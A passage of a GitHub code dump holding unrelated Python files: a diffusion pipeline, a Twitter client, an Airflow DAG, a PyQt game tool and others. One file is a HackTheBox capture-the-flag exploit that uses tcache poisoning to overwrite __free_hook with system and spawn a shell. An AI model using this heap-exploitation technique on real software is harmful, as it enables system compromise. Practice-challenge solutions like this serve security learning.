latents, **extra_step_kwargs).prev_sample\n\n # call the callback, if provided\n if i == len(timesteps) - 1 or ((i + 1) > num_warmup_steps and (i + 1) % self.scheduler.order == 0):\n progress_bar.update()\n if callback is not None and i % callback_steps == 0:\n callback(i, t, latents)\n\n if output_type == \"latent\":\n image = latents\n has_nsfw_concept = None\n elif output_type == \"pil\":\n # 8. Post-processing\n image = self.decode_latents(latents)\n\n # 9. Run safety checker\n image, has_nsfw_concept = self.run_safety_checker(image, device, encoder_hidden_states_list[0].dtype)\n\n # 10. Convert to PIL\n image = self.numpy_to_pil(image)\n else:\n # 8. Post-processing\n image = self.decode_latents(latents)\n\n # 9. 
Run safety checker\n            image, has_nsfw_concept = self.run_safety_checker(image, device, encoder_hidden_states_list[0].dtype)\n\n        # Offload last model to CPU\n        if hasattr(self, \"final_offload_hook\") and self.final_offload_hook is not None:\n            self.final_offload_hook.offload()\n\n        if not return_dict:\n            return (image, has_nsfw_concept)\n\n        return StableDiffusionPipelineOutput(images=image, nsfw_content_detected=has_nsfw_concept)\n\n","repo_name":"mkshing/prompt-plus-pytorch","sub_path":"prompt_plus/prompt_plus_pipeline_stable_diffusion.py","file_name":"prompt_plus_pipeline_stable_diffusion.py","file_ext":"py","file_size_in_byte":19360,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"66"} +{"seq_id":"73643586130","text":"#!/usr/bin/python3\n\"\"\"\nA Python script that searches twitter\n\"\"\"\nimport requests\nimport sys\nimport base64\n\n\ndef getBearerToken():\n    \"\"\"\n    a function that requests an OAuth2 bearer token from the twitter api\n    \"\"\"\n\n    # url encode input arguments\n    _key = requests.utils.quote(sys.argv[1])\n    _secret = requests.utils.quote(sys.argv[2])\n\n    # concat encoded _key and _secret\n    concat = \":\".join([_key, _secret])\n    # Base64 encode string\n    encoded_token = base64.b64encode(concat.encode('utf-8'))\n    encoded_string = str(encoded_token, 'utf-8')\n    content_type = 'application/x-www-form-urlencoded;charset=UTF-8'\n    _url = 'https://api.twitter.com/oauth2/token'\n    _headers = {'Authorization': \"Basic {}\".format(encoded_string),\n                'Content-Type': content_type}\n    _data = 'grant_type=client_credentials'\n    res = requests.request('POST', _url, headers=_headers, data=_data)\n    return(res.json().get('access_token'))\n\n\ndef searchAPI():\n    \"\"\"\n    A function that searches the twitter api\n    \"\"\"\n\n    _search = sys.argv[3]\n    _token = getBearerToken()\n    _url = 'https://api.twitter.com/1.1/search/tweets.json'\n    _params = {'q': _search, 'count': '5'}\n    _headers = {'Authorization': \"Bearer {}\".format(_token)}\n\n    res = requests.request('GET', _url, headers=_headers, params=_params)\n    parsed = res.json()\n    statuses = parsed.get('statuses')\n    for _dict in statuses:\n        _id = _dict.get('id')\n        _text = _dict.get('text')\n        _name = _dict.get('user').get('name')\n        print(\"[{}] {} by {}\".format(_id, _text, _name))\n\nif __name__ == '__main__':\n    searchAPI()\n","repo_name":"dmaring/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/103-search_twitter.py","file_name":"103-search_twitter.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3035836154","text":"import math\nimport re\nfrom datetime import datetime, timedelta\n\nimport lightbulb\n\n\nclass TimeError(lightbulb.LightbulbError):\n    pass\n\n\ntime_regex = re.compile(\"(?:(\\\d{1,5})(h|s|m|d))+?\")\ntime_dict = {\"h\": 3600, \"s\": 1, \"m\": 60, \"d\": 86400}\n\nordinal = lambda n: \"%d%s\" % (\n    n,\n    \"tsnrhtdd\"[(math.floor(n / 10) % 10 != 1) * (n % 10 < 4) * n % 10 :: 4],\n)\n\n\nsteps = dict(\n    year=timedelta(days=365),\n    week=timedelta(days=7),\n    day=timedelta(days=1),\n    hour=timedelta(hours=1),\n    minute=timedelta(minutes=1),\n    second=timedelta(seconds=1),\n    millisecond=timedelta(milliseconds=1),\n)\n\nsteps_shortened = dict(\n    y=timedelta(days=365),\n    w=timedelta(days=7),\n    d=timedelta(days=1),\n    h=timedelta(hours=1),\n    m=timedelta(minutes=1),\n    s=timedelta(seconds=1),\n    ms=timedelta(milliseconds=1),\n)\n\n\ndef 
pretty_timedelta_shortened(td: timedelta) -> str:\n \"\"\"Returns a pretty shortened string of a timedelta\"\"\"\n\n if not isinstance(td, timedelta):\n raise ValueError(f\"timedelta expected, '{type(td)}' given.\")\n\n parts = []\n for name, span in steps_shortened.items():\n if td >= span:\n count = int(td / span)\n td -= count * span\n parts.append(\"{}{}\".format(count, name))\n if len(parts) >= 2 or name == \"s\":\n break\n elif len(parts):\n break\n\n return \" : \".join(parts)\n\n\ndef pretty_timedelta(td: timedelta) -> str:\n \"\"\"Returns a pretty string of a timedelta\"\"\"\n\n if not isinstance(td, timedelta):\n raise ValueError(\"timedelta expected, '{}' given\".format(type(td)))\n\n parts = []\n\n for name, span in steps.items():\n if td >= span:\n count = int(td / span)\n td -= count * span\n parts.append(\"{} {}{}\".format(count, name, \"s\" if count > 1 else \"\"))\n if len(parts) >= 2 or name == \"second\":\n break\n elif len(parts):\n break\n\n return \", \".join(parts)\n\n\ndef pretty_seconds_shortened(s) -> str:\n return pretty_timedelta_shortened(timedelta(seconds=s))\n\n\ndef pretty_seconds(s) -> str:\n return pretty_timedelta(timedelta(seconds=s))\n\n\ndef pretty_datetime(dt: datetime, ignore_time=False) -> str:\n if not isinstance(dt, datetime):\n raise ValueError(\"datetime expected, '{}' given\".format(type(dt)))\n\n return \"{0} {1}\".format(\n ordinal(int(dt.strftime(\"%d\"))),\n dt.strftime(\"%b %Y\" + (\"\" if ignore_time else \" %H:%M\")),\n )\n\n\ndef time_converter(argument: str) -> float:\n \"\"\"Function that converts given time into seconds.\n Parameters\n ----------\n argument : str\n Time to be converted\n Returns\n -------\n float\n Time in seconds.\n Raises\n ------\n TimeError\n When the values are wrong and when the input doesn't match the input regex.\n \"\"\"\n args = argument.lower()\n matches = re.findall(time_regex, args)\n time = 0\n for v, k in matches:\n try:\n time += time_dict[k] * float(v)\n except KeyError:\n raise TimeError(\"{} is an invalid time-key! 
h/m/s/d are valid!\".format(k))\n except ValueError:\n raise TimeError(\"{} is not a number!\".format(v))\n return time\n","repo_name":"Mantra-Development/Mantra-Bot","sub_path":"mantra/core/utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"32836352792","text":"import yaml\nfrom utils.logger import logger\nfrom vars import config_file\n\n\nclass Config:\n __instance = None\n\n @staticmethod\n def get_instance():\n \"\"\"Static access method.\"\"\"\n if Config.__instance is None:\n Config()\n return Config.__instance\n\n def __init__(self):\n \"\"\"Virtually private constructor\"\"\"\n if Config.__instance is not None:\n raise Exception(\"Config class is a singleton!\")\n else:\n Config.__instance = self\n try:\n with open(config_file) as f:\n config = yaml.safe_load(f)\n except Exception:\n logger.critical(f\"Failed to read config file '{config_file}'\")\n raise\n settings = config['settings']\n self.date_format = settings['date_format']\n self.file_name_len_min = settings['file_name_len_min']\n self.file_name_len_max = settings['file_name_len_max']\n","repo_name":"alexturchin88/python-training-fileserver","sub_path":"configuration/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5627287927","text":"import wave\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.fftpack import fft, fftshift, ifft\nfrom scipy import signal\nfrom sys import stdout\n\n\n#read the audio file\nfile_name = input(\"Audio file name -> \").strip() + \".wav\"\nlow_cut_off = int(input( \"Enter lower cut off frequancy -> \"))\nhigh_cut_off = int(input(\"Enter higher cut off frequancy -> \"))\naudio = wave.open(file_name, 'rb')\n\n#extract data from the file\nframe_rate = audio.getframerate()\nnchannels = audio.getnchannels()\nsampwidth = audio.getsampwidth()\nnframes = audio.getnframes()\n\nlow = 2 * low_cut_off / frame_rate\nhigh = 2 * high_cut_off /frame_rate\n\ntypes = {\n 0 : ['Low pass filter', 'lowpass'],\n 1 : ['High pass filter', 'highpass'],\n 2 : ['Band pass filter', 'bandpass'],\n 3 : ['Band stop filter', 'bandstop']\n}\n\nfor i in range(4):\n print(f'{i} : {types[i][0]}')\n\ntype_ = int(input(\"Enter the type of the filrer -> \").strip())\n\nprint(types[type_][1])\n\nb, a = signal.butter(3, [low, high], types[type_][1], analog=False)\n\nprint(\"\\nAudio input data\\n-------------------\\n\")\nprint(f\"Frame rate -> {frame_rate} Hz\")\nprint(f\"nchannels -> {nchannels}\")\nprint(f\"sample width -> {sampwidth}\\n\")\n\n\ndef process_chunk(start_, duration_ = 10):\n\n data = np.array([], dtype=\"int16\")\n\n #set position of audio\n global audio\n audio.rewind()\n audio.setpos(start_ * frame_rate * duration_)\n \n percentage = audio.tell() / audio.getnframes() * 100\n percentage = \"Filtering percentage -> {:.2f} %\".format(percentage)\n stdout.write('\\r' + percentage)\n stdout.flush() # important\n\n for _ in range(duration_):\n tempFrame = np.asarray(np.frombuffer(audio.readframes(frame_rate), dtype='int16'))\n if tempFrame.shape[0] == 0:\n break\n data = np.concatenate((data, tempFrame))\n\n output = signal.lfilter(b, a, data)\n filtered_bytes = output.astype(\"int16\").tobytes()\n\n return filtered_bytes\n\n\n\ndef main():\n duration = nframes / frame_rate\n\n destin = wave.open(f\"{low_cut_off} Hz {high_cut_off} Hz 
filteredSound.wav\", 'wb')\n destin.setnchannels(nchannels)\n destin.setframerate(frame_rate)\n destin.setsampwidth(sampwidth)\n\n for i in range(int(duration / 10) + 1):\n result = process_chunk(i)\n destin.writeframes(result)\n\n percentage = \"Filtering percentage -> {:.2f} %\".format(100)\n stdout.write('\\r' + percentage)\n stdout.flush() # important\n\n destin.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"0301yasiru/EngineeringToolSet","sub_path":"sound_filter.py","file_name":"sound_filter.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38297859935","text":"#!/usr/bin/env python3\n\nfrom pwn import *\n\ncontext.binary = 'bon-nie-appetit'\nglibc = ELF('glibc/libc.so.6', checksec=False)\n\n\ndef get_process():\n if len(sys.argv) == 1:\n return context.binary.process()\n\n host, port = sys.argv[1].split(':')\n return remote(host, port)\n\n\ndef create(p, amount: int, order: bytes):\n p.sendlineafter(b'> ', b'1')\n p.sendlineafter(b'[*] For how many: ', str(amount).encode())\n p.sendafter(b'[*] What would you like to order: ', order)\n\n\ndef show(p, index: int) -> bytes:\n p.sendlineafter(b'> ', b'2')\n p.sendlineafter(b'[*] Number of order: ', str(index).encode())\n p.recvuntil(b' => ')\n return p.recvuntil(b'\\n+=-=-=-=-=-=-=-=-=-=-=-=-=-=+\\n', drop=True)\n\n\ndef edit(p, index: int, order: bytes):\n p.sendlineafter(b'> ', b'3')\n p.sendlineafter(b'[*] Number of order: ', str(index).encode())\n p.sendafter(b'[*] New order: ', order)\n\n\ndef delete(p, index: int):\n p.sendlineafter(b'> ', b'4')\n p.sendlineafter(b'[*] Number of order: ', str(index).encode())\n\n\ndef main():\n p = get_process()\n\n for _ in range(9):\n create(p, 0x88, b'asdf')\n\n for i in range(8, -1, -1):\n delete(p, i)\n\n for _ in range(8):\n create(p, 0x88, b'a')\n\n leak = u64(show(p, 7)[:6].ljust(8, b'\\0'))\n log.info(f'Leaked main_arena address: {hex(leak)}')\n glibc.address = leak - 0x3ebd61\n log.success(f'Glibc base address: {hex(glibc.address)}')\n\n create(p, 0x18, b'A' * 0x18) # 8\n create(p, 0x18, b'B' * 0x18) # 9\n create(p, 0x18, b'C' * 0x18) # 10\n delete(p, 10)\n edit(p, 8, b'A' * 0x18 + b'\\x41')\n\n delete(p, 9)\n create(p, 0x38, b'B' * 0x18 + p64(0x21) + p64(glibc.sym.__free_hook))\n\n create(p, 0x18, b'/bin/sh\\0')\n create(p, 0x18, p64(glibc.sym.system))\n delete(p, 10)\n\n p.interactive()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"7Rocky/HackTheBox-scripts","sub_path":"Challenges/Pwn/Bon-nie-appetit/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"66"} +{"seq_id":"12550239648","text":"#-*- coding:utf-8 -*-\n\nfrom django.db import models\nfrom django.db.models import permalink\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_extensions.db.fields import AutoSlugField\n\nfrom articles.models import Tags\nfrom transmeta import TransMeta\n\n\nclass Category(models.Model):\n __metaclass__ = TransMeta\n\n parent = models.ForeignKey('self', verbose_name=_(\"Parent directory\"),\n blank=True, null=True, related_name='children')\n title = models.CharField(_(\"Title\"), max_length=255,\n blank=True, null=True)\n slug = models.SlugField(_(\"Slug\"))\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n image = models.ImageField(upload_to='category/images', \n 
verbose_name=_(\"Category image\"), blank=True, null=True)\n image_name = models.CharField(editable=False, max_length=255, \n blank=True, null=True)\n objects = models.Manager()\n\n class Meta:\n verbose_name = _(\"Category\")\n verbose_name_plural = _(\"Categories\")\n translate = ('title',)\n\n def __unicode__(self):\n return self.title\n\n\nclass News(models.Model):\n __metaclass__ = TransMeta\n\n category = models.ForeignKey(Category, blank=True, null=True)\n title = models.CharField(_(\"Title\"),\n max_length=255, blank=True, null=True)\n slug = AutoSlugField(populate_from='title', unique=True)\n pub_date = models.DateField(auto_now_add=True, verbose_name=(\"Publication date\")) \n change_date = models.DateField(auto_now = True)\n content = models.TextField(verbose_name=_(\"Text\"))\n is_published = models.BooleanField(verbose_name=_(\"Published\"))\n source = models.CharField(_(\"Source\"), max_length=255,\n blank=True, null=True)\n \n \n class Meta:\n verbose_name = _(\"News\")\n verbose_name_plural = _(\"News\")\n ordering = ['-pub_date']\n translate = ('title', 'content')\n \n def __unicode__(self):\n return self.title\n \n","repo_name":"myvasyabigi/Polonne","sub_path":"src/polonne/apps/news/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"72521684369","text":"from airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.providers.amazon.aws.operators.ecs import ECSOperator\n\n\ndefault_args = {\n 'owner': 'ubuntu',\n 'start_date': datetime(2019, 8, 14),\n 'retry_delay': timedelta(seconds=60*60)\n}\n\nwith DAG('airflow_dag_test_external', catchup=False, default_args=default_args, schedule_interval=None) as dag:\n test = ECSOperator(\n task_id=\"test\",\n dag=dag,\n cluster=\"test-hybrid\",\n task_definition=\"test-external\",\n launch_type=\"EXTERNAL\",\n overrides={\n \"containerOverrides\": [ ],\n },\n awslogs_group=\"/ecs/test-external\",\n awslogs_stream_prefix=\"ecs\",\n )\n\n test","repo_name":"094459/blogpost-airflow-hybrid","sub_path":"dag/ecs-external.py","file_name":"ecs-external.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"70770755092","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QDialog, QMessageBox\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom battle_config import Servant, Enemy, Master, BattleConfig\nimport ViewDetailsUi\nimport pandas as pd\n\n\nclass Ui_ViewDetails(QDialog, ViewDetailsUi.Ui_Dialog):\n\tdef __init__(self):\n\t\tsuper(Ui_ViewDetails, self).__init__()\n\t\tself.setupUi(self)\n\t\tself.label_attribute.setWordWrap(True)\n\t\tself.label_details.setWordWrap(True)\n\t\tself.label_pic.setScaledContents(True)\n\t\tself.view_role_empty()\n\n\tdef view_role_servant(self, battle_round, role):\n\t\tattribute = role.attribute\n\t\tstate = role.state\n\t\t# 设置头像\n\t\tself.label_pic.setPixmap(QPixmap(role.pic_path))\n\t\t# 宝具\n\t\ttext = '宝具类型: ' + role.np_type + ' | ' + role.np_color + '\\n\\n'\n\t\tnp = role.np\n\t\tif len(np) > 0:\n\t\t\ttext += '效果: ' + '\\n'\n\t\tfor name in np['宝具效果'].values:\n\t\t\ttext += str(name) + '\\n'\n\t\ttext += '\\n'\n\t\t# 输出 3 个技能\n\t\tfor i in range(1, 4):\n\t\t\tif i == 1:\n\t\t\t\tskill = role.skill_1\n\t\t\telif i == 2:\n\t\t\t\tskill = role.skill_2\n\t\t\telif i == 3:\n\t\t\t\tskill = 
role.skill_3\n\t\t\telse:\n\t\t\t\treturn\n\n\t\t\ttext += '技能' + str(i) + ': \\n'\n\t\t\tif len(skill) == 0:\n\t\t\t\ttext += '效果暂不支持或对速刷无帮助\\n'\n\n\t\t\tfor i in skill[['技能效果', '幅度']].values:\n\t\t\t\tname = i[0]\n\t\t\t\tnum = str(i[1])\n\t\t\t\tif '(' in name:\n\t\t\t\t\ta = name.rfind('(')\n\t\t\t\t\tname = name[0:a] + num + name[a:len(name)]\n\t\t\t\telse:\n\t\t\t\t\tname = name + num\n\t\t\t\ttext += name + '\\n'\n\t\t\ttext += '\\n'\n\t\ttext = text.strip('\\n')\n\t\ttext = text.replace('nan', '')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\tself.label_details.setText(text)\n\t\t# 输出从者特性\n\t\ttext = ''\n\t\tfor item in attribute:\n\t\t\ttext += item + ', '\n\t\ttext = text.strip(', ')\n\t\tself.label_attribute.setText(text)\n\t\t# 输出从者buff状态\n\t\ttext_name = ' 状态 \\n\\n'\n\t\ttext_num = ' 幅度 \\n\\n'\n\t\ttext_times = ' 剩余次数 \\n\\n'\n\t\ttext_round = ' 剩余回合 \\n\\n'\n\t\tprint(state)\n\t\tfor index, row in state.iterrows():\n\t\t\tif row['开始回合'] <= battle_round <= row['结束回合']:\n\t\t\t\ttext_name += row['效果'] + '\\n'\n\t\t\t\ttext_num += row['幅度'] + '\\n'\n\t\t\t\tif row['剩余次数'] > 10:\n\t\t\t\t\ttext_times += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_times += str(int(row['剩余次数'])) + '\\n'\n\t\t\t\tif row['结束回合'] > 10:\n\t\t\t\t\ttext_round += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_round += str(int(row['结束回合']) - battle_round + 1) + '\\n'\n\n\t\ttext_times = text_times.replace('-1', '')\n\t\ttext_round = text_round.replace('-1', '')\n\t\tself.label_state.setText(text_name.replace('nan', ''))\n\t\tself.label_state_num.setText(text_num.replace('nan', ''))\n\t\tself.label_state_times.setText(text_times.replace('nan', ''))\n\t\tself.label_state_round.setText(text_round.replace('nan', ''))\n\n\tdef view_role_enemy(self, battle_round, role):\n\t\tattribute = role.attribute\n\t\tstate = role.state\n\t\t# 设置头像\n\t\tself.label_pic.setPixmap(QPixmap(role.pic_path))\n\t\t# 设置敌人信息\n\t\ttext = '初始血量: '\n\t\ttext += str(role.health_start) + '\\n\\n'\n\t\ttext += '现有血量: '\n\t\ttext += str(int(round(role.health))) + '\\n\\n'\n\t\ttext += '当前宝具伤害: '\n\t\ttext += str(int(round(role.damage))) + '\\n\\n'\n\t\ttext += '总计受到伤害: '\n\t\ttext += str(int(round(role.damage_total))) + '\\n\\n'\n\t\ttext += '死灵补正: '\n\t\tif role.enemy_np_type == 1:\n\t\t\ttext += '否'\n\t\telse:\n\t\t\ttext += '是'\n\t\tself.label_details.setText(text.replace('nan', ''))\n\t\t# 输出敌人特性\n\t\ttext = ''\n\t\tfor item in attribute:\n\t\t\ttext += item + ', '\n\t\ttext = text.strip(', ')\n\t\tself.label_attribute.setText(text)\n\t\t# 输出敌人buff状态\n\t\ttext_name = ' 状态 \\n\\n'\n\t\ttext_num = ' 幅度 \\n\\n'\n\t\ttext_times = ' 剩余次数 \\n\\n'\n\t\ttext_round = ' 剩余回合 \\n\\n'\n\t\tprint(state)\n\t\tfor index, row in state.iterrows():\n\t\t\tif row['开始回合'] <= battle_round <= row['结束回合']:\n\t\t\t\ttext_name += row['效果'] + '\\n'\n\t\t\t\ttext_num += row['幅度'] + '\\n'\n\t\t\t\tif row['剩余次数'] > 10:\n\t\t\t\t\ttext_times += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_times += str(int(row['剩余次数'])) + '\\n'\n\t\t\t\tif row['结束回合'] > 10:\n\t\t\t\t\ttext_round += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_round += str(int(row['结束回合']) - battle_round + 1) + '\\n'\n\n\t\ttext_times = text_times.replace('-1', '')\n\t\ttext_round = text_round.replace('-1', '')\n\t\tself.label_state.setText(text_name.replace('nan', ''))\n\t\tself.label_state_num.setText(text_num.replace('nan', ''))\n\t\tself.label_state_times.setText(text_times.replace('nan', ''))\n\t\tself.label_state_round.setText(text_round.replace('nan', ''))\n\n\tdef 
view_role_master(self, battle_round, role):\n\t\t# 设置头像\n\t\tself.label_pic.setPixmap(QPixmap(role.pic_path))\n\t\ttext = ''\n\t\t# 输出 3 个技能\n\t\tfor i in range(1, 4):\n\t\t\tif i == 1:\n\t\t\t\tskill = role.skill_1\n\t\t\telif i == 2:\n\t\t\t\tskill = role.skill_2\n\t\t\telif i == 3:\n\t\t\t\tskill = role.skill_3\n\t\t\telse:\n\t\t\t\treturn\n\n\t\t\ttext += '技能' + str(i) + ': \\n'\n\t\t\tif len(skill) == 0:\n\t\t\t\ttext += '效果暂不支持或对速刷无帮助\\n'\n\n\t\t\tfor i in skill[['技能效果', '幅度']].values:\n\t\t\t\tname = i[0]\n\t\t\t\tnum = str(i[1])\n\t\t\t\tif '(' in name:\n\t\t\t\t\ta = name.rfind('(')\n\t\t\t\t\tname = name[0:a] + num + name[a:len(name)]\n\t\t\t\telse:\n\t\t\t\t\tname = name + num\n\t\t\t\ttext += name + '\\n'\n\t\t\ttext += '\\n'\n\t\ttext = text.strip('\\n')\n\t\ttext = text.replace('nan', '')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\tself.label_details.setText(text)\n\n\t\tself.label_attribute.setText('')\n\t\tself.label_state.setText('')\n\t\tself.label_state_num.setText('')\n\t\tself.label_state_times.setText('')\n\t\tself.label_state_round.setText('')\n\n\tdef view_role_empty(self):\n\t\tself.label_attribute.setText('')\n\t\tself.label_state.setText('')\n\t\tself.label_state_num.setText('')\n\t\tself.label_state_times.setText('')\n\t\tself.label_state_round.setText('')\n\t\tself.label_pic.setPixmap(QPixmap())\n\t\tself.label_details.setText('')\n\n\tdef view_role(self, battle_round, role_type, role):\n\t\tif role_type == 'servant':\n\t\t\tif role.health > 0:\n\t\t\t\tself.view_role_servant(battle_round, role)\n\t\t\telse:\n\t\t\t\tself.view_role_empty()\n\t\telif role_type == 'enemy':\n\t\t\tif role.health_start > 0:\n\t\t\t\tself.view_role_enemy(battle_round, role)\n\t\t\telse:\n\t\t\t\tself.view_role_empty()\n\t\telif role_type == 'master':\n\t\t\tif role.order > 0:\n\t\t\t\tself.view_role_master(battle_round, role)\n\t\t\telse:\n\t\t\t\tself.view_role_empty()\n\t\telse:\n\t\t\tself.view_role_empty()\n\n\nif __name__ == '__main__':\n\tapp = QApplication(sys.argv)\n\t# 实例化子窗口\n\tselectservant = Ui_ViewDetails()\n\tselectservant.show()\n\n\tbc = BattleConfig()\n\tbc.battle_ground = '燃烧'\n\tbc.servant_1 = Servant(order=1, servant_id=163, level=90, skill_level=(10, 10, 10), np_level=5)\n\tbc.servant_2 = Servant(order=2, servant_id=215, level=70, skill_level=(10, 10, 10), np_level=5)\n\tbc.servant_3 = Servant(order=3, servant_id=215, level=70, skill_level=(10, 10, 10), np_level=5)\n\tbc.enemy_11 = Enemy(enemy_class='Berserker', health=100)\n\t# bc.enemy_12 = enemy(enemy_class='Saber', health=1000000)\n\tbc.enemy_13 = Enemy(enemy_class='Assassin', health=100, enemy_attribute='龙')\n\n\tbc.use_inherent_skill()\n\tdict1 = {'atk': 1000,\n\t 'range': '己方全体',\n\t '状态[Quick指令卡提升(不可解除)]': ['30%', 1, 3],\n\t '初始NP': 50}\n\tbc.use_costume_skill(1, dict1)\n\tbc.round_start(1)\n\tbc.use_skill(order=2, skill=1, target=1)\n\tbc.use_skill(order=2, skill=1)\n\tbc.use_skill(order=2, skill=3, target=1)\n\tbc.use_skill(order=3, skill=1, target=1)\n\tbc.use_skill(order=3, skill=1)\n\tbc.use_skill(order=3, skill=3, target=1)\n\tbc.use_skill(order=1, skill=3)\n\tbc.use_np(order=1, target=1)\n\tbc.master = Master(1, 10)\n\tselectservant.view_role(1, 'master', bc.master)\n\t#selectservant.view_role(1, 'enemy', 
bc.enemy_11)\n\n\n\n\n\tsys.exit(app.exec_())\n\n\n\n","repo_name":"lsq5i5j/fgo_teamup_win","sub_path":"Code_ViewDetails.py","file_name":"Code_ViewDetails.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"66"} +{"seq_id":"3941290084","text":"from py4j.java_gateway import JavaGateway, java_import\nfrom json.decoder import JSONDecoder\n\n\nclass ResultRecord:\n \"\"\"\n This class embodies an enriched monitoring record, constructed from the json reply of the htm network.\n \"\"\"\n def __init__(self, json_record):\n decoder = JSONDecoder()\n values = decoder.decode(json_record)\n self.state_code = values['stateCode']\n self.country_code = values['countryCode']\n self.site_num = values['siteNum']\n self.parameter_code = values['parameterCode']\n self.poc = values['poc']\n self.lat = values['latitude']\n self.lon = values['longitude']\n self.datum = values['datum']\n self.parameter_name = values['parameterName']\n self.date_local = values['dateLocal']\n self.time_local = values['timeLocal']\n self.date_gmt = values['dateGMT']\n self.time_gmt = values['timeGMT']\n self.sample_measurement = values['sampleMeasurement']\n self.units_of_measure = values['unitsOfMeasure']\n self.mdl = values['mdl']\n self.uncertainty = values['uncertainty']\n self.qualifier = values['qualifier']\n self.method_type = values['methodType']\n self.method_code = values['methodCode']\n self.method_name = values['methodName']\n self.state_name = values['stateName']\n self.county_name = values['countyName']\n self.date_of_last_change = values['dateOfLastChange']\n self.prediction = float(values['prediction'])\n self.error = float(values['error'])\n self.anomaly = float(values['anomaly'])\n self.prediction_next = float(values['predictionNext'])\n\n def __repr__(self):\n return ','.join([self.state_code, self.country_code, self.site_num, self.parameter_code, self.poc, self.lat,\n self.lon, self.datum, self.parameter_name, self.date_local, self.time_local, self.date_gmt,\n self.time_gmt, self.sample_measurement, self.units_of_measure, self.mdl, self.uncertainty,\n self.qualifier, self.method_type, self.method_code, self.method_name, self.state_name,\n self.date_of_last_change, self.prediction, self.error, self.anomaly, self.prediction_next])\n\n\ndef send_to_network(gateway, line):\n \"\"\"This function sends a monitoring record to a Java Gateway and receives the reply as a json.\n\n :param gateway: JavaGateway to use.\n :type gateway: JavaGateway.\n :param line: Input records as a line of comma-separated values.\n :type line: str.\n :return: json.\n \"\"\"\n values = line.split(',') + [0.0, 0.0, 0.0, 0.0]\n raw_record = gateway.jvm.MonitoringRecord(*values)\n record = gateway.entry_point.mappingFunc('1', raw_record).toJson()\n return record\n\n\nif __name__ == '__main__':\n gateway = JavaGateway()\n while True:\n line = input()\n result = send_to_network(gateway, line)\n print(ResultRecord(result))\n","repo_name":"Goopard/SparkStreamingHW","sub_path":"src/test_gateway.py","file_name":"test_gateway.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11629998796","text":"from random import seed\nimport itertools\nimport copy\nimport sys\nfrom collections import defaultdict\n\n\ndef kmersFunction(sequence, k):\n \n kmerIndices = defaultdict(list)\n\n for i in range(len(sequence) - k + 1):\n kmerIndices[str(sequence[i:i+k])].append(i)\n 
return kmerIndices\n\ndef hammingDistance(s1, s2):\n    how_many_differences = 0\n\n    if len(s1) != len(s2):\n        return -1\n    else:\n        for i in range(len(s1)):\n            if s1[i] != s2[i]:\n                how_many_differences += 1\n        return how_many_differences\n\n'''\ncalculating absolute freq of kmers in all reads (1 dist)\niterate through every kmer with freq below t\n\niterate through kmers, find distance between each below t with every above t\nsort by distance, then by absolute freq of the matched kmer\n'''\ndef correctionFunc(reads_path, k, t, d, isFile, kmerFreqNew):\n\n    try:\n        #for kmers\n        k = int(k)\n        #frequency threshold\n        t = int(t)\n        #how many positions we can change\n        d = int(d)\n    except:\n        print('error: bad values of k,t,d')\n        return\n    if k <= 0 or t < 0 or d < 0:\n        print('bad input')\n        return\n\n\n    if isFile:\n        try:\n            with open(reads_path, 'r') as file:\n                all_reads = file.read().split('\\n')\n        except:\n            print('error: bad reads path')\n            return\n    else:\n        all_reads = copy.deepcopy(reads_path)\n\n    try:\n        if not kmerFreqNew:\n            kmerIndices = kmersFunction(''.join(all_reads), k)\n            kmerFreq = {k:len(v) for (k,v) in kmerIndices.items()}\n        else:\n            kmerFreq = copy.deepcopy(kmerFreqNew)\n\n        corrected_set = set()\n\n        for kmer in kmerFreq:\n\n            '''\n            (kmer, distance, absolute frequency)\n            '''\n            kmerReplacements = []\n\n\n            if kmerFreq[kmer] < t:\n                for kmer2 in kmerFreq:\n                    if kmer != kmer2 and kmerFreq[kmer2] >= t:\n                        distance = hammingDistance(kmer, kmer2) \n                        if distance <= d:\n                            kmerReplacements.append((kmer2, distance, kmerFreq[kmer2]))\n                \n                if kmerReplacements:\n                    '''\n                    sort by:\n                    ascending distance\n                    descending freq\n                    '''\n                    kmerReplacements.sort(key = lambda x: (x[1], -x[2]))\n                    \n                    